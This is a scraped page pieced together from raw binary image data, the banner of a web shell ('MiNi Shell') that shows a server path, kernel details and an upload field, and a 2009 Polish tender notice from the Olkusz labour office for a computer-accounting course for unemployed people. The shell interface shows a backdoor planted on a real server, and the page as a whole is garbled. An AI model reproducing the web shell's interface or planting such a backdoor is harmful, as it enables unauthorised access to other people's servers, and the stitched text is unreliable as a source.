JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090514/148544-N-2009.html

<p class="kh_header"><b>Olkusz: Zorganizowanie i przeprowadzenie usługi szkolenia w zakresie  Księgowość komputerowa dla 30 osób bezrobotnych w dwóch 15-to osobowych grupach w ramach Priorytetu VI  Rynek pracy otwarty dla wszystkich współfinansowanego  z Europejskiego Funduszu Społecznego w ramach PO KL  Poddziałanie  6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności  zawodowej osób bezrobotnych.</b><br>
<b>Numer ogłoszenia: 148544 - 2009; data zamieszczenia: 14.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Minkiewicza 2, 32-300 Olkusz, woj. małopolskie, tel. 032 6434348, faks 032 6430538.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.olkusz.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie usługi szkolenia w zakresie  Księgowość komputerowa dla 30 osób bezrobotnych w dwóch 15-to osobowych grupach w ramach Priorytetu VI  Rynek pracy otwarty dla wszystkich współfinansowanego  z Europejskiego Funduszu Społecznego w ramach PO KL  Poddziałanie  6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności  zawodowej osób bezrobotnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zorganizowanie i przeprowadzenie usługi szkolenia w zakresie Księgowość komputerowa dla 30 osób bezrobotnych w dwóch 15-to osobowych grupach w ramach Priorytetu VI  Rynek pracy otwarty dla wszystkich współfinansowanego  z Europejskiego Funduszu Społecznego w ramach PO KL  Poddziałanie  6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności  zawodowej osób bezrobotnych.  
1.1. Zamówienie ma być przeprowadzone zgodnie  z programem szkolenia, który powinien uwzględniać  zróżnicowany poziom  umiejętności  i wiedzy uczestników kursu.
1.2. Program szkolenia winien  być opracowany w oparciu o rozporządzenie Ministra Edukacji i Nauki z dnia 02.03.2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).
 1.3. Program szkolenia powinien uwzględniać wiadomości zgodne z wymogami rynku pracy i  być zgodny z obowiązującymi aktami prawnymi. Program szkolenia powinien być tak skonstruowany aby zapewnić jak najwyższą jakość szkolenia oraz profesjonalne przygotowanie uczestników. 
1.4. Program szkolenia zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 02.03.2007r.  w sprawie szczegółowych warunków prowadzenia  przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. Nr 47, poz. 315) powinien zawierać w szczególności:
a) nazwę i zakres szkolenia,
b) czas trwania i sposób organizacji szkolenia,
c) wymagania wstępne  dla uczestników szkolenia,
d) cele szkolenia,
e) plan nauczania  określający  tematy  zajęć edukacyjnych oraz ich wymiar, z  uwzględnieniem  części teoretycznej i części praktycznej,
f) treści  szkolenia  w zakresie poszczególnych zajęć edukacyjnych,
g) wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
h) sposób sprawdzania efektów szkolenia.
1.5. Program szkolenia  ma zawierać co najmniej 200 godzin zajęć (w tym  co najmniej 75 godzin zajęć teoretycznych i co najmniej 125 godzin zajęć praktycznych ) oraz  1 godzina egzaminu wewnętrznego. 
Przyjmuje się, że:
-  jedna godzina zajęć równa się 60 minutom i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą 15 minut,
- jedna godzina egzaminu równa się 60 minutom.
1.5.1.Program powinien obejmować następujące zagadnienia:
-podstawowe formy  techniki księgowości,
-wspomaganie komputerowe prac księgowych w  przedsiębiorstwie,
-dokumentowanie systemu przetwarzania danych w księgowości przedsiębiorstwa,
-przygotowanie księgowej bazy danych z wykorzystaniem komputera,
-tworzenie formularzy wykorzystywanych w rachunkowości,
-wykorzystanie komputera w kalkulacji prowadzonej w przedsiębiorstwie,
-wykorzystanie komputera w analizie ekonomicznej przedsiębiorstwa,
-obsługa  typowych programów księgowych przedsiębiorstwa,
-ewidencja księgowa z zastosowaniem w pracy programu księgowego,
-zastosowanie systemu bankowości elektronicznej w trybie Klient-Bank,                                        
-zastosowanie systemu bankowości elektronicznej w trybie  Bank - Klient,
-systemy informatyczne w rachunkowości.
Do powyższych tematów zajęć edukacyjnych należy  podać szczegółowe  treści szkolenia i wymiar godzin zajęć teoretycznych i praktycznych.
1.6. Program szkolenia  powinien być opracowany w oparciu o nowe wersje programów użytkowych.
1.7. Celem szkolenia  jest dostarczenie uczestnikom niezbędnej wiedzy  i umiejętności potrzebnych na rynku pracy.
1.8. Szkolenie ma przygotować uczestników w zakresie: 
- identyfikacji podstaw prawnych w zakresie wykorzystania techniki komputerowej w rachunkowości i rozliczeniach firmy, 
- zastosowania komputerów w budowie baz danych i informacyjnych, 
- wykorzystania komputerów w kalkulacji cen, ewidencji i rozliczeniach, 
- praktycznego zastosowania komputerów w korespondencji, 
- stosowania komputerów w analizie ekonomicznej. 
1.8.1. Oczekiwane rezultaty: 
Szkolenie przyczyni się do nabycia niezbędnej wiedzy i umiejętności zawodowych wymaganych na stanowiskach pracowników prowadzących księgowość z wykorzystaniem komputera. 
Zakres tematyczny szkolenia ukierunkowany jest na zorientowanie uczestników w kompleksowym podejściu do zagadnień księgowości wspomaganej coraz częściej i w coraz szerszym zakresie modułami, programami i systemami informatycznymi. 
1.8.2. W wyniku ukończonego szkolenia absolwent kursu będzie umiał: 
- rozróżniać i charakteryzować podstawowe formy techniki księgowości, 
- zidentyfikować i wyszukać podstawowe przepisy prawne dotyczące prowadzenia księgowości z zastosowaniem technik komputerowych, 
- wykorzystywać edytor Word i arkusz kalkulacyjny Excel w bieżącej pracy w księgowości przedsiębiorstwa, 
- budować księgowe bazy danych z wykorzystaniem komputera, 
- tworzyć formularze wykorzystywane w księgowości przedsiębiorstwa, 
- wykorzystywać komputer w kalkulacji, analizie ekonomicznej i innych obszarach księgowości przedsiębiorstwa, 
- opisywać księgową zawartość systemu informatycznego, 
- chronić dane, zbiory danych i programy. 
1.9. Zajęcia muszą odbywać się w pomieszczeniu/ach/ dostosowanym/ych/ do prowadzenia zajęć szkoleniowych i odpowiednio w tym celu wyposażonym tj. w pomieszczeniach posiadających odpowiednie warunki  sanitarne, bezpieczeństwa, akustyczne i jakościowe. 
1.10. Wykonawca  podczas trwania szkolenia  zapewni prawidłowe  warunki pracy  zgodne z przepisami BHP i p.poż
1.11.Wymaga się prowadzenia dokumentacji przebiegu szkolenia stanowiącej:
a)dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin  i tematy zajęć edukacyjnych,
b)protokół z egzaminu,
c)rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji.
1.12. Minimalna liczba godzin szkoleniowych  w ciągu jednego dnia  ma wynosić sześć godzin zegarowych, tygodniowo co najmniej 30 godzin.
1.13. W ramach udzielonego zamówienia Wykonawca  zobowiązany jest  do zorganizowania egzaminu wewnętrznego ze zdobytej  wiedzy teoretycznej i praktycznej  oraz wydania odpowiedniego dokumentu stwierdzającego  ukończenie szkolenia zgodnego z  Rozporządzeniem Ministra  Edukacji i Nauki  z dnia 03.02.2006r. w sprawie uzyskiwania i  uzupełniania  przez osoby dorosłe wiedzy ogólnej, umiejętności  i kwalifikacji zawodowych w formach  pozaszkolnych (Dz. U. Nr 31, poz. 216 ) oraz  certyfikatu o  ukończeniu szkolenia zawierające logo EFS i Unii Europejskiej  oraz logo PO KL zgodnie  z zasadą wizualizacji, a także informacje: Szkolenie: Księgowość komputerowa  w ramach  Priorytetu VI  Rynek pracy otwarty dla wszystkich współfinansowanego z Europejskiego  Funduszu Społecznego  w ramach PO KL Poddziałanie  6.1.3 Poprawa zdolności do  zatrudnienia oraz podnoszenie  poziomu aktywności zawodowej osób bezrobotnych.
Logo EFS i PO KL do pobrania ze strony internetowej: 
www.pup.olkusz.info.pl/logo_efs.jpg
www.pup.olkusz.info.pl/logo_pokl.jpg
1.14. W przypadku, kiedy  w szkoleniu  będzie uczestniczyć  osoba poruszająca się na wózku inwalidzkim lub osoba  niepełnosprawna  nie poruszająca się samodzielnie Wykonawca zobowiązany  jest do udzielenia pomocy w przypadku trudności  w poruszaniu się  po obiekcie, w którym odbywać się będzie szkolenie.
1.15. Szkolenia powinny być przeprowadzone przez doświadczoną i wykwalifikowaną kadrę, posiadającą odpowiednie wykształcenie i doświadczenie zawodowe.
1.16. Każdemu z uczestników szkolenia powinny być przekazane nieodpłatnie materiały biurowe i szkoleniowe typu:
a) zeszyt,
b) długopis,
c) skrypty,
d) materiały do ćwiczeń .
Materiały szkoleniowe przekazywane  uczestnikom szkolenia powinny być adekwatne do treści szkolenia. Materiały wykorzystywane podczas realizacji szkolenia powinny być przekazywane uczestnikom szkolenia na początku szkolenia bądź na bieżąco zgodnie z realizowanym tematem zajęć. 
Materiały biurowe i szkoleniowe opracowane przez wykładowców powinny zawierać  logo EFS i Unii Europejskiej  oraz logo PO KL zgodnie z zasadą wizualizacji, a także  informacje: Szkolenie: Księgowość komputerowa w ramach Priorytetu VI  Rynek pracy otwarty dla wszystkich współfinansowanego z Europejskiego Funduszu Społecznego w ramach PO KL  Poddziałanie  6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności  zawodowej osób bezrobotnych.  
1.17. Uczestnicy szkolenia powinni być objęci opieką z ramienia instytucji szkoleniowej. Każde szkolenie powinno mieć swojego opiekuna, osobę odpowiedzialną za organizację i realizację szkolenia, wskazaną do kontaktu w umowie  stanowiącej załącznik nr 7a  do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności objętych przedmiotem postępowania tj.
-  posiadają aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej (np. wpis do ewidencji działalności gospodarczej, wpis do KRS,), 
-  posiadają aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez właściwy Wojewódzki Urząd Pracy zgodnie z art. 20  ustawy z dnia 20 kwietnia 2004 r. o promocji  zatrudnienia i instytucjach rynku pracy (tekst jednolity Dz. U. z 2008r. Nr 69 poz. 415 z późn.zm.) instytucja szkoleniowa oferująca szkolenia dla bezrobotnych i poszukujących pracy może uzyskać zlecenie finansowane ze środków publicznych na prowadzenie tych szkoleń po wpisie do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę  instytucji szkoleniowej.
1.2. posiadają niezbędną wiedzę i doświadczenie: w postępowaniu może wziąć udział Wykonawca, który wykaże się przeprowadzeniem z należytą starannością, co najmniej  jednego szkolenia w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres  prowadzenia  działalności jest krótszy  -   w tym okresie -  o tematyce  tożsamej z  przedmiotem zamówienia tzn. należy uwzględnić  tylko szkolenia zawierające w programie min. 80 godz. zajęć dydaktycznych  obejmujących zarówno zagadnienia teoretyczne z zakresu księgowości oraz praktyczne wykorzystanie komputera w księgowości.
1.3. dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, z których każda musi posiadać co najmniej :
a) łącznie roczny staż  pracy dydaktycznej związanej z  przedmiotem zamówienia,
b) wykształcenie wyższe zawodowe lub magisterskie,
c) ukończony kurs pedagogiczny, studium  pedagogiczne, studia pedagogiczne lub inny dokument uprawniający do prowadzenia zajęć.
1.4. dysponują potencjałem technicznym umożliwiającym  realizację przedmiotu zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego umożliwiającego realizację przedmiotu zamówienia,                       
Na jednego  uczestnika  musi przypadać  jedno stanowisko  szkoleniowe. Każdy z uczestników szkolenia powinien  mieć indywidualny  dostęp do sprzętu wykorzystywanego przy realizacji szkolenia.
Warunkiem udziału w postępowaniu  jest wykazanie realizacji przedmiotu zamówienia z wykorzystaniem minimum 15 komputerów.
1.5. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.6. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust. 1 i  2 w-w ustawy,
1.7. w postępowaniu może wziąć udział Wykonawca, który zagwarantuje zorganizowanie szkolenia, w granicach administracyjnych Miasta Olkusza.
Zamawiający wyklucza możliwość prowadzenia szkolenia metodą  e- learning.
W przypadku ubiegania się wspólnie przez Wykonawców o udzielenie zamówienia:
-Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu 
 o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
-Warunki udziału w postępowaniu określone w pkt 5.1.1, 5.1.6, 5.1.7. SIWZ powinien spełniać każdy Wykonawca z osobna, 
-Warunki udziału w postępowaniu określone w pkt  5.1.2, 5.1.3 ,5.1.4, 5.1.5. SIWZ Wykonawcy mogą spełniać łącznie. 
Ocena spełniania warunków udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia potwierdzające ich spełnienie zgodnie z formułą spełnia - nie spełnia. Nie spełnianie jakiegokolwiek z w-w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z  dnia 29 stycznia 2004r. Prawo zamówień publicznych:
1.1. Oświadczenie Wykonawcy o spełnieniu warunków określonych w  art. 22 ust.1 i nie podleganiu wykluczeniu z art. 24 ust.1 i 2  ustawy Prawo  zamówień publicznych  stanowiące załącznik nr 3 specyfikacji, przedstawione w formie oryginału i podpisane przez Wykonawcę lub osobę upoważnioną do podpisania oferty.
1.2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej (np. wpis do ewidencji   działalności gospodarczej, wpis do KRS,). 
Dokument powinien być przedstawiony w formie kserokopii poświadczonej za   
zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do podpisania oferty.
Odpis lub zaświadczenie powinno być wystawione nie wcześniej  niż 6 miesięcy  przed upływem terminu składania ofert.            
1.3. Wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej zgodnie z art.20 ustawy  z dnia 20 kwietnia 2004r.o promocji zatrudnienia i instytucjach rynku pracy i  Rozporządzeniem MG i P z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych.
Instytucje szkoleniowe, które dokonały wpisu przed 2009r. winny złożyć zaświadczenie potwierdzające kontynuację  działalności szkoleniowej w roku bieżącym lub oświadczenie potwierdzające kontynuację działalności szkoleniowej w bieżącym roku. 
Dokumenty powinny być przedstawione w formie kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę  lub osobę upoważnioną do podpisania oferty.
2.  W przypadku  Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. wspólnicy spółki cywilnej lub członkowie konsorcjum ) należy złożyć następujące dokumenty :
2.1. Pełnomocnictwo ustanawiające pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zawierające umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i do zawarcia umowy. Pełnomocnictwo powinno być  złożone w oryginale  lub w formie kserokopii potwierdzonej notarialnie.
2.2. Dokumenty, o którym mowa w punkcie 6.1.1., 6.1.2. i  6.1.3  specyfikacji składane dla każdego  z wykonawców wspólnie ubiegających się o udzielenie zamówienia.
3. W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć: 
3.1. Wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował Wykonawca i które  będą uczestniczyć w wykonywaniu zamówienia na załączniku nr 5 do specyfikacji.    
Wykaz powinien zawierać informacje na temat wykształcenia, posiadania uprawnień pedagogicznych w/w osób i podmiotów oraz ich doświadczenia zawodowego, a także zakresu wykonywanych przez nie czynności. Kadra uczestnicząca  w wykonaniu zamówienia  musi spełniać wymagania,  o których mowa w pkt  5.1.3  niniejszej specyfikacji. Ponadto należy złożyć  CV wykładowców  oraz ksero  dokumentów potwierdzających posiadanie uprawnień pedagogicznych.
Nie należy przedstawiać listy wszystkich wykładowców zatrudnionych przez Wykonawcę, tylko wykładowców przewidzianych do realizacji szkolenia Księgowość komputerowa.
Jeżeli Wykonawca  wskaże osoby, którymi będzie dysponował zobowiązany jest złożyć  pisemne zobowiązanie  innych podmiotów  do udostępnienia  osób zdolnych do wykonania  zamówienia.
3.2 Wykaz niezbędnych do wykonania zamówienia narzędzi, urządzeń i sprzętu, którymi dysponuje lub będzie dysponował  Wykonawca - załącznik nr 11 do SIWZ.
Jeżeli Wykonawca  wskaże urządzenia i sprzęty , którymi będzie dysponował zobowiązany jest złożyć  pisemne zobowiązanie  innych podmiotów  do udostępnienia  niezbędnych  do wykonania  zamówienia urządzeń i sprzętu.
Nie należy  wymieniać narzędzi, urządzeń  i sprzętu, który nie  ma  bezpośredniego związku z   realizacją zamówienia, a znajduje się, bądź będzie się znajdował na  wyposażeniu bazy lokalowej.
3.3. Załącznik nr 6 do SIWZ - wykaz wykonanych szkoleń w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres  prowadzenia działalności jest krótszy  -   w tym okresie -  o tematyce  tożsamej z  przedmiotem zamówienia tzn. należy uwzględnić  tylko szkolenia zawierające  w programie min. 80 godz. zajęć dydaktycznych obejmujących zarówno zagadnienia teoretyczne z zakresu księgowości oraz praktyczne wykorzystanie komputera w księgowości.
Ponadto należy dołączyć  dokumenty potwierdzające , że usługi zostały wykonane należycie np. referencje, pochwały itp. ( z wyłączeniem  dokumentów wystawionych Wykonawcy  przez Zamawiającego tj. PUP Olkusz) w oryginale lub w formie kserokopii potwierdzonych za zgodność z oryginałem podpisanych przez  osobę uprawnianą.				                       	
Należy dołączyć  dokumenty poświadczające należyte wykonanie  zamówień od co najmniej jednego  Zamawiającego, u którego Wykonawca  realizował zamówienia( z wyłączeniem dokumentów  wystawionych Wykonawcy  przez  Zamawiającego tj. PUP Olkusz).
4.  W celu potwierdzenia, że Wykonawca  znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć:
4.1. Pisemne oświadczenie o nie zaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne stanowiące załącznik nr 8 specyfikacji, przedstawione w formie oryginału i podpisane przez Wykonawcę lub inną osobę upoważnioną do podpisania oferty. Zamawiający może żądać na wniosek okazania w-w dokumentów w ciągu 14 dni. W przypadku zażądania przez Zamawiającego w-w dokumentów winny one być  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.    
5. Pisemne oświadczenie o zagwarantowaniu zorganizowania szkolenia w granicach administracyjnych Miasta Olkusza, stanowiące załącznik nr 9 specyfikacji, przedstawione w formie oryginału i podpisane przez Wykonawcę lub inną osobę upoważnioną do podpisania oferty.
6. W przypadku kiedy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej należy złożyć:
6.1.Zamiast dokumentów, o którym mowa w pkt 6.1.2. SIWZ -  dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6.2.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Daty wystawienia stosuje się odpowiednio.
6.3.Jeżeli dokumenty wyżej wymienione Wykonawca składa  w języku obcym, należy również złożyć  tłumaczenie na język polski, poświadczone przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70.00</li>
<li>2 - Doświadczenie - 30.00</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pup.olkusz.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Olkuszu
ul Minkiewicza 2
Sekretariat pk 8.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2009 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Olkuszu
ul Minkiewicza 2
Sekretariat pk 8.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com